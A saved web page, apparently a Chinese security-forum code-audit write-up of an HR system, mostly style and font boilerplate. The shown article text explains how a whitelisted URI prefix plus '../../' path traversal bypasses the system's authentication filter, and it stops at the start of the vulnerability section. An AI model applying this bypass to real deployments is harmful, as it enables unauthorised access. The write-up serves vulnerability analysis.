mirror of
https://github.com/Mr-xn/Penetration_Testing_POC.git
synced 2025-11-06 03:03:57 +00:00
459 lines
1.3 MiB
HTML
459 lines
1.3 MiB
HTML
|
|
<!DOCTYPE html> <html><!--
|
|||
|
|
Page saved with SingleFile
|
|||
|
|
url: https://forum.butian.net/share/2929
|
|||
|
|
--><meta charset=utf-8>
|
|||
|
|
<meta http-equiv=X-UA-Compatible content="IE=edge">
|
|||
|
|
<meta name=viewport content="width=device-width, initial-scale=1">
|
|||
|
|
<meta name=csrf-token content=VD0owLiLrat8LaN2vBAqJtnLFngrtZgXtzYM7DqG>
|
|||
|
|
<title>奇安信攻防社区-记某景的一次代码审计</title>
|
|||
|
|
<meta name=keywords content=奇安信,天眼,补天,漏洞,情报,攻防,安全>
|
|||
|
|
<meta name=description content=奇安信攻防社区-记某景的一次代码审计>
|
|||
|
|
<meta name=author content="QIANXIN Team">
|
|||
|
|
<meta name=copyright content="2021 QIANXIN.com">
|
|||
|
|
<style>@media(max-width:767px){}</style>
|
|||
|
|
<style>/*!
|
|||
|
|
* Bootstrap v3.4.1 (https://getbootstrap.com/)
|
|||
|
|
* Copyright 2011-2019 Twitter, Inc.
|
|||
|
|
* Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE)
|
|||
|
|
*//*! normalize.css v3.0.3 | MIT License | github.com/necolas/normalize.css */html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}a:active,a:hover{outline:0}img{border:0}textarea{color:inherit;font:inherit;margin:0}textarea{overflow:auto}/*! Source: https://github.com/h5bp/html5-boilerplate/blob/master/src/css/main.css */*{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}:after,:before{-webkit-box-sizing:border-box;-moz-box-sizing:border-box;box-sizing:border-box}html{-webkit-tap-highlight-color:rgba(0,0,0,0)}a:focus,a:hover{color:#23527c;text-decoration:underline}a:focus{outline:5px auto -webkit-focus-ring-color;outline-offset:-2px}img{vertical-align:middle}h2,h3{font-family:inherit;font-weight:500;line-height:1.1;color:inherit}h3{margin-top:20px;margin-bottom:10px}h3{font-size:24px}p{margin:0 0 10px}@media(min-width:768px){}.text-muted{color:#777}ul{margin-top:0;margin-bottom:10px}.list-inline{padding-left:0;list-style:none;margin-left:-5px}.list-inline>li{display:inline-block;padding-right:5px;padding-left:5px}@media(min-width:768px){}code{color:#c7254e}pre{display:block;margin:0 0 10px;color:#333;word-break:break-all;border:1px solid #ccc}.container{padding-right:15px;padding-left:15px;margin-right:auto;margin-left:auto}@media(min-width:768px){.container{width:750px}}@media(min-width:992px){.container{width:970px}}@media(min-width:1200px){.container{width:1170px}}.row{margin-right:-15px;margin-left:-15px}.col-xs-12{position:relative;min-height:1px;padding-right:15px;padding-left:15px}.col-xs-12{float:left}.col-xs-12{width:100%}@media(min-width:768px){}@media(min-width:992px){.col-md-9{float:left}}@media(min-width:1200px){}@media screen and (max-width:767px){}@media screen and (-webkit-min-device-pixel-ratio:0){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-device-width:480px) and (orientation:landscape){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(min-width:768px){}@media(min-width:768px){}@media(min-width:768px){}@media(max-width:767px){}@media(max-width:767px){}@media screen and (min-width:768px){}@-webkit-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@-o-keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@keyframes progress-bar-stripes{from{background-position:40px 0}to{background-position:0 0}}@media(min-width:768px){}@media(min-width:992px){}@media all and (transform-3d),(-webkit-transform-3d){}@media screen and (min-width:768px){}.btn-group-vertical>.btn-group:after,.btn-group-vertical>.btn-group:before,.btn-toolbar:after,.btn-toolbar:before,.clearfix:after,.clearfix:before,.container-fluid:after,.container-fluid:before,.container:after,.container:before,.dl-horizontal dd:after,.dl-horizontal dd:before,.form-horizontal .form-group:after,.form-horizontal .form-group:before,.modal-footer:after,.modal-footer:before,.modal-header:after,.modal-header:before,.nav:after,.nav:before,.navbar-collapse:after,.navbar-collapse:before,.navbar-header:after,.navbar-header:before,.navbar:after,.navbar:before,.pager:after,.pager:before,.panel-body:after,.panel-body:before,.row:after,.row:before{display:table;content:" "}.btn-group-vertical>.btn-group:after,.btn-toolbar:after,.clearfix:after,.container-fluid:after,.container:after,.dl-horizontal dd:after,.form-horizontal .form-group:after,.modal-footer:after,.modal-header:after,.nav:after,.navbar-collapse:after,.navbar-header:after,.navbar:after,.pager:after,.panel-body:after,.row:after{clear:both}@-ms-viewport{width:device-width}@media(max-width:767px){}@media(max-width:767p
|
|||
|
|
<style>/*!
|
|||
|
|
* Font Awesome 4.7.0 by @davegandy - http://fontawesome.io - @fontawesome
|
|||
|
|
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
|
|||
|
|
*/@font-face{font-family:"FontAwesome";src:url(data:font/woff2;base64,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
|
|||
|
|
<style>@media(min-width:1200px){}@media(min-width:768px){}@media(max-width:767px){}@media(max-width:767px){}pre{white-space:pre-wrap}@media(min-width:768px){}@media(min-width:992px){}@media(min-width:1200px){}html{font-size:10px;-webkit-tap-highlight-color:transparent}body{font-family:-apple-system,"Helvetica Neue",Helvetica,Arial,"PingFang SC","Hiragino Sans GB","WenQuanYi Micro Hei","Microsoft Yahei",sans-serif;font-size:14px;line-height:1.5;color:#333;background-color:#f6f6f6;word-break:break-word}textarea{font-family:inherit;font-size:inherit;line-height:inherit}ul{padding:0}.wrap{padding-bottom:30px;position:relative}.main{background-color:#fff;border-radius:4px}.mb-20{margin-bottom:20px}.mt-10{margin-top:10px}.mt-30{margin-top:30px}.taglist-inline{list-style:none;padding:0;font-size:0}.taglist-inline li{padding:0;font-size:13px}.taglist-inline>li{display:inline-block;margin-right:5px}.taglist-inline>li:last-child{margin-right:0}.widget-article .quote{padding:25px;background:#f3f5f9;line-height:24px;overflow:hidden}@media(min-width:768px){}.word-wrap{word-wrap:break-word;word-break:normal}::-webkit-scrollbar{width:6px;height:6px}::-webkit-scrollbar-thumb{background-color:#e4e6eb;outline:0;border-radius:2px}::-webkit-scrollbar-track{box-shadow:none;border-radius:2px}</style>
|
|||
|
|
<style>a{text-decoration:none}a:focus,a:hover{color:#004e31;text-decoration:underline}@media(max-width:767px){}@media(max-width:767px){}.tag{display:inline-block;padding:0 8px;color:#017e66;background-color:#e7f2ed;height:24px;line-height:24px;font-weight:400;font-size:13px;text-align:center}.tag[href]:focus,.tag[href]:hover{background-color:#017e66;color:#fff;text-decoration:none}</style>
|
|||
|
|
<style>@-moz-keyframes blink{50%{background-color:transparent}}@-webkit-keyframes blink{50%{background-color:transparent}}@keyframes blink{50%{background-color:transparent}}pre code.hljs{overflow-x:auto}.hljs{color:#000}.hljs-built_in,.hljs-keyword{color:#00f}.hljs-literal,.hljs-string,.hljs-title{color:#a31515}.hljs-attr{color:red}.markdown-body{color-scheme:light;--color-prettylights-syntax-comment:#6e7781;--color-prettylights-syntax-constant:#0550ae;--color-prettylights-syntax-entity:#8250df;--color-prettylights-syntax-storage-modifier-import:#24292f;--color-prettylights-syntax-entity-tag:#116329;--color-prettylights-syntax-keyword:#cf222e;--color-prettylights-syntax-string:#0a3069;--color-prettylights-syntax-variable:#953800;--color-prettylights-syntax-brackethighlighter-unmatched:#82071e;--color-prettylights-syntax-invalid-illegal-text:#f6f8fa;--color-prettylights-syntax-invalid-illegal-bg:#82071e;--color-prettylights-syntax-carriage-return-text:#f6f8fa;--color-prettylights-syntax-carriage-return-bg:#cf222e;--color-prettylights-syntax-string-regexp:#116329;--color-prettylights-syntax-markup-list:#3b2300;--color-prettylights-syntax-markup-heading:#0550ae;--color-prettylights-syntax-markup-italic:#24292f;--color-prettylights-syntax-markup-bold:#24292f;--color-prettylights-syntax-markup-deleted-text:#82071e;--color-prettylights-syntax-markup-deleted-bg:#ffebe9;--color-prettylights-syntax-markup-inserted-text:#116329;--color-prettylights-syntax-markup-inserted-bg:#dafbe1;--color-prettylights-syntax-markup-changed-text:#953800;--color-prettylights-syntax-markup-changed-bg:#ffd8b5;--color-prettylights-syntax-markup-ignored-text:#eaeef2;--color-prettylights-syntax-markup-ignored-bg:#0550ae;--color-prettylights-syntax-meta-diff-range:#8250df;--color-prettylights-syntax-brackethighlighter-angle:#57606a;--color-prettylights-syntax-sublimelinter-gutter-mark:#8c959f;--color-prettylights-syntax-constant-other-reference-link:#0a3069;--color-fg-default:#24292f;--color-fg-muted:#57606a;--color-fg-subtle:#6e7781;--color-canvas-default:#fff;--color-canvas-subtle:#f6f8fa;--color-border-default:#d0d7de;--color-border-muted:hsl(210,18%,87%);--color-neutral-muted:rgba(175,184,193,0.2);--color-accent-fg:#0969da;--color-accent-emphasis:#0969da;--color-attention-subtle:#fff8c5;--color-danger-fg:#cf222e}.markdown-body{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%;margin:0;color:var(--color-fg-default);background-color:var(--color-canvas-default);font-family:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji";font-size:16px;line-height:1.5;word-wrap:break-word}.markdown-body img{border-style:none;max-width:100%;-webkit-box-sizing:content-box;box-sizing:content-box;background-color:var(--color-canvas-default)}.markdown-body ::-webkit-input-placeholder{color:inherit;opacity:.54}.markdown-body ::-webkit-file-upload-button{-webkit-appearance:button;font:inherit}.markdown-body h2,.markdown-body h3{margin-top:24px;margin-bottom:16px;line-height:1.25}.markdown-body h2{font-weight:600;padding-bottom:.3em;font-size:1.5em;border-bottom:1px solid var(--color-border-muted)}.markdown-body h3{font-weight:600;font-size:1.25em}.markdown-body code{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace}.markdown-body pre{font-family:ui-monospace,SFMono-Regular,SF Mono,Menlo,Consolas,Liberation Mono,monospace;word-wrap:normal}.markdown-body ::-webkit-input-placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body ::placeholder{color:var(--color-fg-subtle);opacity:1}.markdown-body::before{display:table;content:""}.markdown-body::after{display:table;clear:both;content:""}.markdown-body>*:first-child{margin-top:0 !important}.markdown-body>*:last-child{margin-bottom:0 !important}.markdown-body p,.markdown-body pre{margin-top:0;margin-bottom:16px}.markdown-body code{padding:.2em .4em;margin:0;font-size:85%;background-color:var(--color-neutral-muted);border-radius:6px}.markdown-body pre code{font-size:100%}.markdown-body pre>code{word-break:normal;white-space:
|
|||
|
|
<style>#md_view{padding:0 20px}#md_view img:hover{cursor:pointer}</style>
|
|||
|
|
<!--[if lt IE 9]>
|
|||
|
|
<script src="/static/js/html5shiv.min.js"></script>
|
|||
|
|
<script src="/static/js/respond.min.js"></script>
|
|||
|
|
<![endif]-->
|
|||
|
|
<style>html #layuicss-skinlayercss{display:none;position:absolute;width:1989px}@-webkit-keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceIn{0%{opacity:0;-webkit-transform:scale(.5);-ms-transform:scale(.5);transform:scale(.5)}100%{opacity:1;-webkit-transform:scale(1);-ms-transform:scale(1);transform:scale(1)}}@-webkit-keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInDown{0%{opacity:0;-webkit-transform:scale(.1) translateY(-2000px);-ms-transform:scale(.1) translateY(-2000px);transform:scale(.1) translateY(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateY(60px);-ms-transform:scale(.475) translateY(60px);transform:scale(.475) translateY(60px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes fadeInUpBig{0%{opacity:0;-webkit-transform:translateY(2000px);-ms-transform:translateY(2000px);transform:translateY(2000px)}100%{opacity:1;-webkit-transform:translateY(0);-ms-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@keyframes zoomInLeft{0%{opacity:0;-webkit-transform:scale(.1) translateX(-2000px);-ms-transform:scale(.1) translateX(-2000px);transform:scale(.1) translateX(-2000px);-webkit-animation-timing-function:ease-in-out;animation-timing-function:ease-in-out}60%{opacity:1;-webkit-transform:scale(.475) translateX(48px);-ms-transform:scale(.475) translateX(48px);transform:scale(.475) translateX(48px);-webkit-animation-timing-function:ease-out;animation-timing-function:ease-out}}@-webkit-keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes rollIn{0%{opacity:0;-webkit-transform:translateX(-100%) rotate(-120deg);-ms-transform:translateX(-100%) rotate(-120deg);transform:translateX(-100%) rotate(-120deg)}100%{opacity:1;-webkit-transform:translateX(0) rotate(0);-ms-transform:translateX(0) rotate(0);transform:translateX(0) rotate(0)}}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes shake{0%,100%{-webkit-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);transform:translateX(10px)}}@keyframes shake{0%,100%{-webkit-transform:translateX(0);-ms-transform:translateX(0);transform:translateX(0)}10%,30%,50%,70%,90%{-webkit-transform:translateX(-10px);-ms-transform:translateX(-10px);transform:translateX(-10px)}20%,40%,60%,80%{-webkit-transform:translateX(10px);-ms-transform:translateX(10px);transform:translateX(10px)}}@-webkit-keyframes fadeIn{0%{opacity:0}100%{opacity:1}}@-webkit-keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);transform:scale(.7)}30%{-webkit-transform:scale(1.05);transform:scale(1.05)}0%{-webkit-transform:scale(1);transform:scale(1)}}@keyframes bounceOut{100%{opacity:0;-webkit-transform:scale(.7);-ms-transform:scale(.7);transform:scale(.
|
|||
|
|
* Waves v0.7.5
|
|||
|
|
* http://fian.my.id/Waves
|
|||
|
|
*
|
|||
|
|
* Copyright 2014-2016 Alfiana E. Sibuea and other contributors
|
|||
|
|
* Released under the MIT license
|
|||
|
|
* https://github.com/fians/Waves/blob/master/LICENSE
|
|||
|
|
*/</style><style>@media(max-height:620px){}@media(max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media(pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:transl
|
|||
|
|
<body>
|
|||
|
|
<div class="global-nav mb-50" style="display:none !important">
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class="top-alert mt-60 clearfix text-center" style="display:none !important">
|
|||
|
|
<!--[if lt IE 9]>
|
|||
|
|
<div class="alert alert-danger topframe" role="alert">你的浏览器实在<strong>太太太太太太旧了</strong>,放学别走,升级完浏览器再说
|
|||
|
|
<a target="_blank" class="alert-link" href="http://browsehappy.com">立即升级</a>
|
|||
|
|
</div>
|
|||
|
|
<![endif]-->
|
|||
|
|
|
|||
|
|
</div>
|
|||
|
|
<div class=wrap>
|
|||
|
|
<div class=container>
|
|||
|
|
<div class="row mt-10">
|
|||
|
|
<div class="col-xs-12 col-md-9 main">
|
|||
|
|
<div class=widget-article>
|
|||
|
|
<h3 class="title word-wrap">记某景的一次代码审计</h3>
|
|||
|
|
<ul class=taglist-inline>
|
|||
|
|
<li class=tagPopup><a class=tag href=https://forum.butian.net/topic/48>漏洞分析</a></li>
|
|||
|
|
</ul>
|
|||
|
|
<div class="content mt-10">
|
|||
|
|
<div class="quote mb-20">
|
|||
|
|
过滤器查找+漏洞审计+加解密算法破解
|
|||
|
|
</div>
|
|||
|
|
<textarea id=md_view_content style=display:none>0x00 前言
|
|||
|
|
-------
|
|||
|
|
|
|||
|
|
我只能说,某景漏洞多的一。。。。。。
|
|||
|
|
今天,就捡两个公开过的漏洞进行下审计吧
|
|||
|
|
|
|||
|
|
0x01 过滤器查找
|
|||
|
|
----------
|
|||
|
|
|
|||
|
|
有经验的师傅都知道,此系统很多接口是做了鉴权的,并不能未授权访问。但是,有的接口加白了,可以通过加白接口进行路径穿越绕过鉴权。
|
|||
|
|
废话不多说,开始正题。一般过滤器都会在web.xml里找到对应的接口与类名,搜索单词filter,定位到HireKeywordFilter类
|
|||
|
|
|
|||
|
|

|
|||
|
|
查看代码,`var3.doFilter(var1, var2);`这行代码是调用FilterChain对象的`doFilter`方法,将ServletRequest对象和ServletResponse对象传递给下一个过滤器或Servlet进行处理。在Servlet过滤器中,通过调用`FilterChain`的`doFilter`方法,可以将请求传递给过滤器链中的下一个过滤器,或者如果没有下一个过滤器了,则传递给Servlet进行处理。
|
|||
|
|
|
|||
|
|

|
|||
|
|

|
|||
|
|
在这个例子中,若var6也就是uri是以/w\_selfservice/oauthservlet开头的,即执行`var3.doFilter(var1, var2);`。那么当我访问其他接口。则使用/w\_selfservice/oauthservlet../../即可绕过鉴权
|
|||
|
|
|
|||
|
|
0x02 漏洞审计
|
